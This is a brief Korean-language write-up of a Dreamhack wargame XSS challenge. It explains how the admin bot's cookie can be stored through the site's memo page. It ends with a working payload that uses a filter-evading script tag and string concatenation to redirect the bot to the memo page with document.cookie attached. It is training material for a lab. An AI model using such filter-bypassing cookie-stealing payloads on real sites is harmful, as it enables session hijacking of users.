https://dreamhack.io/wargame/challenges/433

flag 페이지에서 params에 넣어서 제출하면 check_xss 함수를 통해 vuln 페이지로 param 값을 넣어서 페이지를 읽음. 이 때 아래와 같은 포인트가있음

memo 페이지를 호출하면 memo로 전달된 값이 남게되는데 위 취약점과 연계해서 cookie를 저장하도록 하면 후에 그 값을 볼 수 있음

exploit

<scronipt>document['locatio'+'n'].href = "/memo?memo=" + document.cookie;</scronipt>